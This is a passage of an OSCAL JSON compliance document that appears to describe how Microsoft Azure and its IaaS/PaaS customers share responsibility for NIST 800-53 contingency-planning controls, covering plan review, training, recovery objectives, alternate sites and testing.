(BCDR) Program section of the Azure Global Portal. 
Service teams are responsible for distributing service plans."}],"responsibilities":[{"uuid":"ab29524f-855a-404b-bca6-746be14e16c7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-007"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for distributing the contingency plans.","provided-uuid":"9f33c01a-cf9b-4fdb-bc25-3e7929285d22"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"805436c6-310b-4fcd-a6ed-d2c9099a37ec","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-008"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cp-2_smt.c","by-components":[{"uuid":"bfdeaf29-b5a5-4dde-9a2c-510ad58f5ea2","export":{"provided":[{"uuid":"fad4929b-c91c-46ad-9b8a-268d8d125eb4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-008"}],"description":"Microsoft coordinates contingency planning with incident handling for Azure services as defined in the Azure Incident Management Standard Operating Procedure (SOP). 
Security and availability incidents are closely intertwined with business continuity and disaster recovery processes."}],"responsibilities":[{"uuid":"17150e6e-d26d-44fc-ba91-dfdb9158df8a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-008"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for coordinating contingency planning with incident handling.","provided-uuid":"fad4929b-c91c-46ad-9b8a-268d8d125eb4"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"570d3602-3462-468f-8047-6bd0ed9a351d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-009"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cp-2_smt.d","by-components":[{"uuid":"14ba47b2-6a71-4a9d-83de-1851d6d8aaad","export":{"provided":[{"uuid":"f3306d78-4a41-437b-adbe-168d8dba170a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-009"}],"description":"Microsoft reviews the BCP and DRP for Azure services by following the policies defined in the Azure Business Continuity and Disaster Recovery SOP. These policies ensure plans are reviewed at least annually by the Azure BCM team. Service teams are required to revalidate the BCDR Program section of the Azure Global Portal on an annual basis as well. 
Any service team contingency plans not meeting Azure standards are rejected for re-work and have to be resubmitted."}],"responsibilities":[{"uuid":"9bc5af80-2fd6-4754-bf25-f979b645e1c8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-009"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for reviewing the contingency plan.","provided-uuid":"f3306d78-4a41-437b-adbe-168d8dba170a"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"c21057c7-a133-4f0b-a7f0-f62c7b4a8022","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-010"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cp-2_smt.e","by-components":[{"uuid":"fdf1e04b-bf92-470c-ad71-edf62eb77c2b","export":{"provided":[{"uuid":"07f7e9a6-67e6-4fb5-b385-85e1e362025f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-010"}],"description":"Microsoft updates the BCP and DRP on an annual basis and to address changes to the organization, information system, or environment of operation and problems encountered during plan implementation, execution, or testing. Reviews are conducted by the Azure BCM team, following the policies defined in the Azure Business Continuity and Disaster Recovery SOP. Service teams are required to revalidate the BCDR Program section of the Azure Global Portal on an annual basis as well. 
Any service team contingency plans not meeting Azure standards are rejected for re-work and have to be resubmitted."}],"responsibilities":[{"uuid":"84aa770c-640b-4226-9cf9-ccefca8b757f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-010"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for updating the contingency plan to address changes to the organization, resources, or environment of operation, and problems encountered during implementation, execution, or testing of contingency activities.","provided-uuid":"07f7e9a6-67e6-4fb5-b385-85e1e362025f"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"7b67b310-8633-4b86-bf52-762e79dcced7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-011"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cp-2_smt.f","by-components":[{"uuid":"89aa781d-7509-4666-aa93-e2214ba4ecdb","export":{"provided":[{"uuid":"c503bf74-7310-4e79-8787-165bf41201da","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-011"}],"description":"Microsoft updates all plans for Azure services, following the policies defined in the Azure Business Continuity and Disaster Recovery SOP, including notifications to personnel via email, SharePoint, the BCDR Program in the Azure Global Portal, and service-team-specific notifications."}],"responsibilities":[{"uuid":"88100026-6c1e-4995-b42c-7a42724914c2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-011"}],"description":"For customers of IaaS and PaaS 
services, the customer is responsible for communicating changes made to the contingency plan.","provided-uuid":"c503bf74-7310-4e79-8787-165bf41201da"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"f78071fa-c155-4850-8605-fbf3e03dc1ba","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-012"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cp-2_smt.g","by-components":[{"uuid":"0eda02f0-03d8-4540-972d-346166d55396","export":{"provided":[{"uuid":"9a0f55d1-dcd9-4e40-a41d-17130ee32a2d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-012"}],"description":"Microsoft updates the BCP and DRP on an annual basis and to address changes to the organization, information system, or environment of operation and problems encountered during plan implementation, execution, or testing. Reviews are conducted by the Azure BCM team, following the policies defined in the Azure Business Continuity and Disaster Recovery SOP. Service teams are required to revalidate the BCDR Program section of the Azure Global Portal on an annual basis as well. Any service team contingency plans not meeting Azure standards are rejected for re-work and have to be resubmitted. Service teams are responsible for onboarding to BCDR Manager. 
Lessons learned from BCDR assessments are incorporated for future testing by service teams."}],"responsibilities":[{"uuid":"21137262-edf6-4d62-b96c-ecdfff226b0a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-012"}],"description":"The customer is responsible for incorporating lessons learned from contingency plan testing, training, or actual contingency activities into contingency testing and training for customer-deployed resources.","provided-uuid":"9a0f55d1-dcd9-4e40-a41d-17130ee32a2d"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"549bdefb-9202-4087-be1e-3492757c2c07","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-013"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cp-2_smt.h","by-components":[{"uuid":"28370a27-6b2e-49a8-8c8a-e0ecd901ba79","export":{"provided":[{"uuid":"d9a04e11-6106-43c5-8af8-58f5f9cd0621","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-013"}],"description":"Microsoft protects the DRP, BCP, and service-specific plans for Azure services from unauthorized disclosure and modification. This is accomplished using SharePoint and Azure Global Portal access controls. 
Training and the Employee Agreement protect against the disclosure of information by Azure personnel."}],"responsibilities":[{"uuid":"334aabd8-c35d-449d-beb0-7d07152d2edc","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-013"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for protecting the contingency plan to prevent unauthorized disclosure or modification of the plan.","provided-uuid":"d9a04e11-6106-43c5-8af8-58f5f9cd0621"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"d71c45ff-0155-4bb1-93dd-2ce93acb60cb","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cp-2.1","statements":[{"uuid":"95b5be15-439f-4190-90a5-6fc616eb93fa","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-014"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cp-2.1_smt","by-components":[{"uuid":"0361ebb3-2d35-46cc-bf6e-edfb08a0ae0d","export":{"provided":[{"uuid":"de8e264f-0e0b-48bb-9742-2f3554f3b2f1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-014"}],"description":"Following Microsoft's Enterprise Business Continuity Management (EBCM) methodology, Azure has implemented the Azure Business Continuity Plan (BCP) and Azure Disaster Recovery Plan (DRP) which provide guidance and detailed procedures for recovery of Azure business operations. 
These documents address the purpose, scope, roles, responsibilities, compliance requirements, and required coordination among the various Microsoft organizations providing support for the security of Azure. The business continuity process contains a strategy for the recovery of Azure assets and the resumption of key Azure business processes. These contingency planning procedures are in accordance with NIST SP 800-34 Rev. 1, Contingency Planning Guide for Federal Information Systems. Additionally, Azure has created the Incident Management SOP, which supports and is leveraged by the Azure BCP, DRP, and contingency planning procedures specific to Azure."}],"responsibilities":[{"uuid":"8e6b170c-7378-4925-bf57-f6e7ff2928d5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-014"}],"description":"The customer is responsible for coordinating contingency plan development with organizational elements responsible for related plans (e.g., business continuity, disaster recovery).","provided-uuid":"de8e264f-0e0b-48bb-9742-2f3554f3b2f1"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"e4cb3144-14c2-42da-af00-1efac23afaa2","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cp-2.2","statements":[{"uuid":"bee87d50-4049-486d-8611-4d809a59901d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-015"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cp-2.2_smt","by-components":[{"uuid":"68e897ac-ee1e-4128-a7b5-e1d427fed902","export":{"provided":[{"uuid":"1fa3f1ee-f38c-4393-8d01-25a97bce2928","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-015"}],"description":"Azure implements a capacity planning process that ensures adequate resources are available for the Azure environment. The capacity management process includes the determination of the overall size, performance and resilience of the system. 
The capacity management process includes the following activities:\n\n* Understanding the current demands and forecasting future requirements\n* Monitoring performance and throughput of services and supporting infrastructure components\n* Carrying out tuning activities to ensure efficient utilization of available resources\n* Establishing and enforcing the policy for the platform services contingency capacity buffer"}],"responsibilities":[{"uuid":"989941e4-1213-402b-8908-ce4530de8c27","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-015"}],"description":"The customer is responsible for conducting capacity planning to ensure customer-deployed resources continue operating during contingency activities. Note: if the customer configures Microsoft Azure appropriately for reserving processing capacity in an alternate region, Azure can support continued system operation during contingency activities.","provided-uuid":"1fa3f1ee-f38c-4393-8d01-25a97bce2928"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"0f5cd086-9236-4208-a512-244095dc7840","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cp-2.3","statements":[{"uuid":"b0192400-1419-4364-a453-b77606edd31c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-016"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cp-2.3_smt","by-components":[{"uuid":"159aa43d-3bca-48ff-8d67-9fade3e578bd","export":{"provided":[{"uuid":"751634ea-8b18-4a63-809f-260f603df8c9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-016"}],"description":"Azure plans for the resumption of essential services within each service's Recovery Time Objective (RTO) defined by the Business Impact Analysis (BIA) within the service-specific plans. Essential services are defined as those with an RTO of 168 hours or less."}],"responsibilities":[{"uuid":"693f591e-9a30-4114-986c-9f523c9bb82e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-016"}],"description":"The customer is responsible for resuming essential mission and business functions once contingency activities have commenced. 
Note: if the customer configures Microsoft Azure appropriately for reserving processing capacity in an alternate region, Azure can support continued system operation during contingency activities.","provided-uuid":"751634ea-8b18-4a63-809f-260f603df8c9"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"fce6bb93-f36c-4d3e-854e-11506195cf8a","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cp-2.5","statements":[{"uuid":"624cdf2f-7642-48d6-b834-3bee5f367232","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-017"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cp-2.5_smt","by-components":[{"uuid":"83de037a-0cab-481c-a951-b10b2703f4dd","export":{"provided":[{"uuid":"efe577b8-c9ba-462f-b49f-01c77bcebe6a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-017"}],"description":"Azure plans for the continuance of essential missions and business functions by establishing alternate storage and processing sites at geographically distributed Azure datacenters. Data is replicated between primary and alternate sites automatically, depending on the region recovery classification of the service. Azure does not consider any given datacenter or region as alternate - all sites are equally primary, and services determine the level of resiliency required. 
All sites have equivalent physical and logical security safeguards."}],"responsibilities":[{"uuid":"d1bb5b1a-4744-415d-b3ef-e9cf50e4f861","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-017"}],"description":"The customer is responsible for continuing essential mission and business functions with little or no loss of operational continuity and sustaining that continuity until full resource restoration has occurred at primary processing and/or storage sites for all customer-deployed resources. Microsoft Azure can support continued system operation during contingency activities if the customer configures Azure appropriately for reserving processing capacity in an alternate region.","provided-uuid":"efe577b8-c9ba-462f-b49f-01c77bcebe6a"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"249ac414-99be-4532-b281-c9992c30612a","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cp-2.8","statements":[{"uuid":"a1ae80e1-7599-4d0c-bb26-d8a365b952a3","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-018"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cp-2.8_smt","by-components":[{"uuid":"b99ade44-bc2f-48ab-b2b5-f4dbceb43cda","export":{"provided":[{"uuid":"25057f13-9779-45d6-af03-451853913f64","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-018"}],"description":"Azure establishes recovery time objectives (RTO) for all Azure services and documents 
those RTOs as part of the BCM process. Essential services are defined as those with an RTO of 168 hours or less."}],"responsibilities":[{"uuid":"8d9eb4e3-61b7-4c5a-9884-24513809c12d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-018"}],"description":"The customer is responsible for identifying critical customer-deployed resources.","provided-uuid":"25057f13-9779-45d6-af03-451853913f64"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"cb793a5a-a3bc-45c2-8264-7abe9e3731e7","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cp-3","statements":[{"uuid":"f0a4ddf4-6667-48c8-8916-c339e231f93a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-019"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cp-3_smt.a","by-components":[{"uuid":"381bb541-c022-4490-8916-ca43680847d9","export":{"provided":[{"uuid":"bfc2a374-d1f5-4e52-b033-f2f68d172cd7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-019"}],"description":"Within ten (10) days of personnel taking on contingency roles and responsibilities, Azure ensures that required contingency training takes place. All personnel with a contingency planning role receive training on an annual basis, defined as a rolling three hundred and sixty five (365) days from the last training date. 
Upon completion of the training, personnel certify electronically that they have been trained, and the training record is stored and managed automatically by the BCDR Program training tool in the Azure Global Portal. The process is documented in the Azure BCDR Training and Awareness SOP. Evidence of training is stored in the BCDR Program training tool in the Azure Global Portal."}],"responsibilities":[{"uuid":"34e14e07-886d-49e0-9c68-7dccc45e4b99","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-019"}],"description":"The customer is responsible for providing contingency training to users of customer-deployed resources in accordance with assigned roles and responsibilities.","provided-uuid":"bfc2a374-d1f5-4e52-b033-f2f68d172cd7"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"2965ab58-b784-4efa-bbcc-34a089b379d9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-020"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cp-3_smt.b","by-components":[{"uuid":"6d5a6d15-36e7-4ca3-94a2-232bd54a4ea7","export":{"provided":[{"uuid":"5519358e-28c5-4de3-a05f-3bd6b39b3add","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-020"}],"description":"Service team BCP owners and crisis communications managers receive training by participating in simulated events, including regular recovery testing and disaster recovery drills, as well as the training course within the BCDR Program training tool in the Azure Global Portal. 
This training occurs at least annually and prior to assuming a contingency-related role, as well as whenever system changes occur."}],"responsibilities":[{"uuid":"675b1623-e94d-4c80-95d9-177a71e346e6","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-020"}],"description":"The customer is responsible for providing contingency retraining to users of customer-deployed resources, when changes occur, in accordance with assigned roles and responsibilities.","provided-uuid":"5519358e-28c5-4de3-a05f-3bd6b39b3add"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"1778ab99-57a4-4be3-82cb-3a69364d5ae0","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cp-3.1","statements":[{"uuid":"6606824a-aa54-4692-a9aa-443aa91eca1e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-021"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cp-3.1_smt","by-components":[{"uuid":"70d04e20-abd8-485d-8def-435b787f3383","export":{"provided":[{"uuid":"5898846e-0899-4e35-91b4-bd1ca04101dc","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-021"}],"description":"Azure includes live-site exercises and functional failover tests in training for personnel with contingency planning and recovery responsibilities. The objective of these exercises is to maximize plan accuracy and team preparedness to respond to incidents. 
Microsoft injects faults during testing to verify successful recovery, allowing teams to respond to simulated incidents."}],"responsibilities":[{"uuid":"fb9a724c-1828-4222-aec8-efbaaa477fcf","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-021"}],"description":"The customer is responsible for facilitating effective response by personnel in crisis situations by incorporating simulated events into contingency training.","provided-uuid":"5898846e-0899-4e35-91b4-bd1ca04101dc"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"7b9f97be-859f-498a-b0ba-950bc1cf3e8c","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cp-4","statements":[{"uuid":"d495d897-9200-4f5c-a54b-de8596f21488","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-022"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cp-4_smt.a","by-components":[{"uuid":"d6e7caff-635e-48df-b137-b8c4ae729f1d","export":{"provided":[{"uuid":"8f1b2f53-8fde-4802-b890-7c00c557e24b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-022"}],"description":"The BCDR Team coordinates with the Drill team, which schedules end-to-end recovery tests, drives execution of the tests, identifies recovery gaps, and communicates test results. 
At least one major end-to-end scenario at the datacenter level, including shutdown of all core mission critical services in a real-life scenario, is tested annually.\n\nIn addition, each service team performs tests annually to exercise its scenario listed in the Azure BCP and DRP. These cover every component and critical process listed in the Azure BCP and DRP. Functional exercises are also completed in real time on an ongoing basis as incidents occur."}],"responsibilities":[{"uuid":"09f2a52c-09ed-4448-ae84-18462ab17da1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-022"}],"description":"The customer is responsible for testing the contingency plan for customer-deployed resources.","provided-uuid":"8f1b2f53-8fde-4802-b890-7c00c557e24b"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"3a8c1ba9-22bf-498f-89cc-b8955213445f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-023"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cp-4_smt.b","by-components":[{"uuid":"c79dc834-73ab-4546-8fb6-bbc2d6addb50","export":{"provided":[{"uuid":"6e3caee3-d6b7-4994-a8bc-6ab005d542f8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-023"}],"description":"Service teams create testing reports for all BCDR tests, which are reviewed by the BCDR team and entered into the BCDR Program in the Azure Global Portal. 
The BCDR team ensures that testing happens as per the defined schedule."}],"responsibilities":[{"uuid":"ece8bb19-0b1b-4746-aa57-a6a116184b78","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-023"}],"description":"The customer is responsible for reviewing the results of contingency plan testing (see CP-04.a).","provided-uuid":"6e3caee3-d6b7-4994-a8bc-6ab005d542f8"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"909bad66-7dd8-455d-934c-26e97f56a7b5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-024"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cp-4_smt.c","by-components":[{"uuid":"27174e98-e106-4181-862b-c2b4b608869b","export":{"provided":[{"uuid":"52f88a52-754c-4849-92c7-389d8f22e648","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-024"}],"description":"As a result of the testing performed, the Drill team, in conjunction with the BCDR team and service teams, reviews supporting evidence documented in the BCDR Program in the Azure Global Portal and in work items in Azure DevOps and identifies improvement opportunities for short-, medium-, and long-term follow-up. If critical issues are identified during an exercise, they are worked on until resolution, and BCDR documentation is updated accordingly as needed. The overall readiness of the BCP and DRP includes the readiness to execute the plan per the test results.\n\nAzure assesses the effects on organizational operations and assets for every test exercise. 
The appropriate service team updates BCDR documentation for any issue identified."}],"responsibilities":[{"uuid":"7f486f53-26ac-47b3-83e7-1ee7d87bf927","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-024"}],"description":"The customer is responsible for initiating corrective action regarding contingency plan testing.","provided-uuid":"52f88a52-754c-4849-92c7-389d8f22e648"}]},"description":"See inheritance and customer responsibility 